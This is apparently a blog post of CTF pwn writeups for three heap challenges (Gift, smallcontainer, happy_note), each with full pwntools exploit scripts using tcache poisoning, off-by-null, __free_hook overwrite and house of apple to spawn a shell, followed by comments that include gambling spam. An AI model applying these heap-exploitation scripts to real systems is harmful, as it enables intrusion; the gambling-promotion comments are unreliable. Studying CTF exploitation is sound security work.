2022 巅峰极客 Pwn Writeup – 影二つ的博客

不得不说，icq的比赛🍉就是多

Gift

2.31的UAF，没有edit功能

通过bargain还价修改fd，伪造一条tcache的链来做到任意地址分配

注意到还的价格可以为负数，这样就可以避免0x10的限制而是将fd指针指向自身chunk内

from pwn import*
r=remote("123.56.45.214",44298)
#r=process('./pwn')
context.log_level='debug'

def new(size,content):
	r.recvuntil("your choice:\n")
	r.sendline("2")
	r.recvuntil("your choice:\n")
	r.sendline(str(size))
	r.recvline()
	r.send(content)

def delete(idx):
	r.recvuntil("your choice:\n")
	r.sendline("3")
	r.recvline()
	r.sendline(str(idx))

def show(idx):
	r.recvuntil("your choice:\n")
	r.sendline("4")
	r.recvline()
	r.sendline(str(idx))

def gift(idx,size):
	r.recvuntil("your choice:\n")
	r.sendline("5")
	r.recvline()
	r.sendline(str(idx))
	r.recvline()
	r.sendline(str(size))

new(1,"\n")
new(1,"\n")

delete(0)
delete(1)

show(1)
r.recvuntil("cost: ")
heap=int(r.recvline())-0x260
success("heap: "+hex(heap))

new(1,"\x00"*0x10+p64(heap+0x400)+"\x00"*0x68+p64(heap+0x410))
new(1,p64(heap+0x390))

delete(0)
delete(1)

gift(1,-0x10)

new(1,"\n")
new(1,"\n")
new(1,"\x00")

delete(0)

show(0)
r.recvuntil("cost: ")
libc_base=int(r.recvline())-0x3ebca0
success("libc_base: "+hex(libc_base))

new(1,p64(libc_base+0x3ed8d8))

new(1,"\n")
new(1,p64(libc_base+0x4f302))

delete(8)

#gdb.attach(r)

r.interactive()

smallcontainer

生硬的off by null，检测到\x11就置为\x00

还是2.27的libc，没有pre_size检测，常规方法造uaf即可

from pwn import*
r=remote("123.56.121.45",23924)
#r=process('./smallcontainer')
context.log_level='debug'

libc=ELF("./libc-2.27.so")

def new(size):
	r.recvuntil("> ")
	r.sendline("1")
	r.recvuntil(": ")
	r.sendline(str(size))

def delete(idx):
	r.recvuntil("> ")
	r.sendline("2")
	r.recvuntil(": ")
	r.sendline(str(idx))

def edit(idx,content):
	r.recvuntil("> ")
	r.sendline("3")
	r.recvuntil(": ")
	r.sendline(str(idx))
	r.send(content)

def show(idx):
	r.recvuntil("> ")
	r.sendline("4")
	r.recvuntil(": ")
	r.sendline(str(idx))

for i in range(10): new(0x208)

for i in range(3,10): delete(i)

for i in range(7): new(0x1F8)
for i in range(3,10): delete(i)

delete(0)

edit(2,"a"*0x1F8+p64(0x221))
edit(1,"a"*0x208)
edit(1,"a"*0x200+p64(0x420))

delete(2)

for i in range(7): new(0x208)

new(0x208)

show(1)

libc_base=int(r.recvuntil("This is a cyber container",drop=True),16)-libc.sym["__malloc_hook"]-0x70
success("libc_base: "+hex(libc_base))

new(0x108)

delete(9)
edit(1,p64(libc_base+libc.sym["__free_hook"]))

new(0x108)
new(0x108)

edit(10,p64(libc_base+libc.sym["system"]))
edit(0,"/bin/sh\n")

delete(0)

#gdb.attach(r)

r.interactive()

happy_note

2.34版本，一次UAF机会

常规泄漏之后，直接house of apple完事

from pwn import*
r=remote("182.92.74.66",17827)
#r=process('./happy_note')
context.log_level='debug'

libc=ELF("./libc.so.6")

def new(idx,size,mode):
	r.recvuntil(">> ")
	r.sendline("1")
	r.recvline()
	r.sendline(str(size))
	r.recvline()
	r.sendline(str(idx))
	r.recvline()
	r.sendline(str(mode))

def delete(idx):
	r.recvuntil(">> ")
	r.sendline("2")
	r.recvline()
	r.sendline(str(idx))

def show(idx):
	r.recvuntil(">> ")
	r.sendline("3")
	r.recvline()
	r.sendline(str(idx))

def edit(idx,content):
	r.recvuntil(">> ")
	r.sendline("4")
	r.recvline()
	r.sendline(str(idx))
	r.recvline()
	r.send(content)

def gift(idx):
	r.recvuntil(">> ")
	r.sendline("666")
	r.recvline()
	r.sendline(str(idx))

def xor(ptr1,ptr2):
	return (ptr1>>12)^ptr2

for i in range(11): new(i,0x108,1)

for i in range(7): delete(i)

gift(7)
show(7)

r.recvuntil("content: ")
libc_base=u64(r.recvuntil("\n",drop=True).ljust(0x8,"\x00"))-0x219cc0
success("libc_base: "+hex(libc_base))

_IO_wfile_jumps=libc_base+0x2160c0

new(0,0x100,1)

delete(9)
delete(7)

show(0)

r.recvuntil("content: ")
heap=u64(r.recvuntil("\n",drop=True).ljust(0x8,"\x00"))-0xc20
success("heap: "+hex(heap))

new(2,0x100,1)
new(3,0xE8,1)
new(4,0xE8,1)

delete(4)
delete(3)

edit(0,p64(xor(heap,libc_base+libc.sym["_IO_list_all"])))

new(5,0xE8,2)
new(6,0xE8,2)

new(7,0x200,1)

fake_IO_struct=""
fake_IO_struct=fake_IO_struct.ljust(0x18,"\x00")
fake_IO_struct+=p64(1)
fake_IO_struct=fake_IO_struct.ljust(0x58,"\x00")
fake_IO_struct+=p64(libc_base+0xeacef)
fake_IO_struct=fake_IO_struct.ljust(0x90,"\x00")
fake_IO_struct+=p64(heap+0xf30)
fake_IO_struct=fake_IO_struct.ljust(0xc8,"\x00")
fake_IO_struct+=p64(_IO_wfile_jumps)
fake_IO_struct=fake_IO_struct.ljust(0xd0,"\x00")
fake_IO_struct+=p64(heap+0xf30)

edit(7,fake_IO_struct)

edit(6,p64(heap+0xf30))


#gdb.attach(r,"b _IO_wdoallocbuf")

delete(9)

r.interactive()

附件下载

thna0a

3 年前
2022-9-04 18:36:06

师傅Gift那题libc泄露有问题吧
- thna0a
  
  thna0a
  
  3 年前
  2022-9-05 14:17:19
  
  我用的是glibc2.31的，所以打不通，打扰了
thna0a

3 年前
2022-9-05 6:43:29

Gift这题glibc应该是2.27的
33wincom

1 月前
2026-1-05 9:33:16

Alright, 33wincom is worth giving a shot, folks. Nothing to lose! My thoughts for u is 33wincom
lucky888game

1 月前
2026-1-08 8:19:46

Feeling lucky? I gave lucky888game a shot and I wasn’t disappointed. Good bonuses and a solid range of games. Worth a look if you’re chasing that big win. Find your fortune at lucky888game
đá gà c1 hôm nay

1 月前
2026-1-12 10:01:44

Hey guys, anyone catch the ‘đá gà c1 hôm nay’ matches? Was hoping for some good fights! Check it out here đá gà c1 hôm nay if you missed it.
7m.cn.maccao

6 天前
2026-2-11 14:41:46

Looking for 7m.cn.maccao? This page seems alright – worth a look if you’re after those specific details. Happy punting, mate! 7m.cn.maccao
888 bet

6 天前
2026-2-11 14:42:02

Found some 888 bet offers on 881bet777. Gonna check them out and see if there’s anything juicy! Fingers crossed! Go check it out!: 888 bet
88vin link

6 天前
2026-2-11 14:42:17

Gotta say, 88vin link is pretty slick. The loading times are fast, and the graphics are sharp. I’ll be spending my free time here now! 88vin link

Gift

smallcontainer

happy_note

附件下载

评论

发送评论编辑评论

Gift

smallcontainer

happy_note

附件下载

评论

发送评论 编辑评论

发送评论编辑评论